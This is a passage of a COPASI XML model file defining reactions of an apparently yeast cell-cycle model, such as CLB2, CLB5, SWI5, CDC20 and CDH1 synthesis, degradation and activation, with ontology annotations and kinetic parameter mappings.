<Product metabolite="Metabolite_109" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4207" name="Vkpf6" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_82">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_262">
<SourceParameter reference="Metabolite_107"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_569">
<SourceParameter reference="ModelValue_159"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_571">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_27" name="F5P dephosphorylation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_27">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:3.1.3.48" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004721" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006470" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_109" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_107" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4208" name="Vppf6" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_83">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_567">
<SourceParameter reference="Metabolite_109"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_572">
<SourceParameter reference="ModelValue_170"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_574">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_26" name="CLB2 degradation in F2" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_26">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0008054" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0051437" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_103" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_77" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4209" name="Vdb2" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_84">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_570">
<SourceParameter reference="Metabolite_103"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_575">
<SourceParameter reference="ModelValue_155"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_577">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_25" name="CLB5 degradation in F5" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_25">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0008054" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0051437" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_107" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_77" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4210" name="Vdb5" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_85">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_573">
<SourceParameter reference="Metabolite_107"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_578">
<SourceParameter reference="ModelValue_154"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_580">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_24" name="CDC6 degradation in F2P" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_24">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_105" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_89" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4211" name="kd3f6" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_86">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_576">
<SourceParameter reference="Metabolite_105"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_583">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_581">
<SourceParameter reference="ModelValue_82"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_23" name="CDC6 degradation in F5P" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_23">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_109" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_93" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4212" name="kd3f6" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_87">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_579">
<SourceParameter reference="Metabolite_109"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_586">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_584">
<SourceParameter reference="ModelValue_82"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_22" name="CLB2 degradation in F2P" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_22">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0008054" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0051437" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_105" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_79" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4213" name="Vdb2" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_88">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_582">
<SourceParameter reference="Metabolite_105"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_587">
<SourceParameter reference="ModelValue_155"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_589">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_21" name="CLB5 degradation in F5P" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_21">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0008054" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0051437" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_109" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_79" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4214" name="Vdb5" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_89">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_585">
<SourceParameter reference="Metabolite_109"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_590">
<SourceParameter reference="ModelValue_154"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_592">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_20" name="Synthesis of SWI5" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_20">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0006412" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfProducts>
<Product metabolite="Metabolite_151" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_121" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4215" name="ksswi_p" value="1"/>
<Constant key="Parameter_4216" name="ksswi_p_p" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_90">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_595">
<SourceParameter reference="Metabolite_121"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_597">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_593">
<SourceParameter reference="ModelValue_144"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_588">
<SourceParameter reference="ModelValue_145"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_19" name="Degradation of SWI5" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_19">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_151" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4217" name="kdswi" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_91">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_594">
<SourceParameter reference="Metabolite_151"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_599">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_598">
<SourceParameter reference="ModelValue_104"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_18" name="Degradation of SWI5P" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_18">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_153" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4218" name="kdswi" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_92">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_596">
<SourceParameter reference="Metabolite_153"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_602">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_600">
<SourceParameter reference="ModelValue_104"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_17" name="Activation of SWI5" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_17">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:3.1.3.48" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004721" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006470" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0051091" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_153" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_151" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_21" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4219" name="kaswi" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_93">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_591">
<SourceParameter reference="Metabolite_21"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_607">
<SourceParameter reference="Metabolite_153"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_605">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_603">
<SourceParameter reference="ModelValue_72"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_16" name="Inactivation of SWI5" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_16">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:2.7.11.22" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004693" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006468" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0043433" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_151" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_153" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_89" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4222" name="kiswi" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_94">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_604">
<SourceParameter reference="Metabolite_89"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_611">
<SourceParameter reference="Metabolite_151"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_609">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_608">
<SourceParameter reference="ModelValue_114"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_15" name="Activation of IEP" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_15">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:2.7.11.22" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004693" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006468" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_111" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_113" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4223" name="Jaiep" value="1"/>
<Constant key="Parameter_4224" name="Vaiep" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_95">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_613">
<SourceParameter reference="Metabolite_111"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_601">
<SourceParameter reference="ModelValue_41"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_612">
<SourceParameter reference="ModelValue_166"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_615">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_14" name="Inactivation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_14">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0001100" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006470" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_113" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_111" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4220" name="Jiiep" value="1"/>
<Constant key="Parameter_4221" name="kiiep" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_96">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_617">
<SourceParameter reference="Metabolite_113"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_616">
<SourceParameter reference="ModelValue_48"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_619">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_606">
<SourceParameter reference="ModelValue_110"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_13" name="Synthesis of inactive CDC20" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_13">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0006412" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfProducts>
<Product metabolite="Metabolite_1" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_121" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4225" name="ks20_p" value="1"/>
<Constant key="Parameter_4226" name="ks20_p_p" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_97">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_621">
<SourceParameter reference="Metabolite_121"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_623">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_620">
<SourceParameter reference="ModelValue_123"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_610">
<SourceParameter reference="ModelValue_124"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_12" name="Degradation of inactiveCDC20" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_12">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_1" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4227" name="kd20" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_98">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_614">
<SourceParameter reference="Metabolite_1"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_625">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_624">
<SourceParameter reference="ModelValue_77"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_11" name="Degradation of active CDC20" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_11">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_5" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4228" name="kd20" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_99">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_622">
<SourceParameter reference="Metabolite_5"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_628">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_626">
<SourceParameter reference="ModelValue_77"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_10" name="Activation of CDC20" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_10">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0031536" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_1" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_5" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_113" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4229" name="ka20_p" value="1"/>
<Constant key="Parameter_4230" name="ka20_p_p" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_100">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_635">
<SourceParameter reference="Metabolite_1"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_631">
<SourceParameter reference="Metabolite_113"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_633">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_629">
<SourceParameter reference="ModelValue_58"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_618">
<SourceParameter reference="ModelValue_59"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_9" name="Inactivation_2" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_9">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0001100" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_5" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_1" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_117" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4231" name="k" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_101">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_638">
<SourceParameter reference="Metabolite_5"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_632">
<SourceParameter reference="Metabolite_117"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_627">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_636">
<SourceParameter reference="Parameter_4231"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_8" name="CDH1 synthesis" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_8">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0006412" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfProducts>
<Product metabolite="Metabolite_83" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4232" name="kscdh" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_102">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_630">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_639">
<SourceParameter reference="ModelValue_133"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_7" name="CDH1 degradation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_7">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_83" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4233" name="kdcdh" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_103">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_640">
<SourceParameter reference="Metabolite_83"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_642">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_634">
<SourceParameter reference="ModelValue_90"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_6" name="CDH1i degradation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_6">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_85" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4234" name="kdcdh" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_104">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_637">
<SourceParameter reference="Metabolite_85"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_645">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_643">
<SourceParameter reference="ModelValue_90"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_5" name="CDH1i activation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_5">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:3.1.3.48" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004721" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006470" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0031536" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
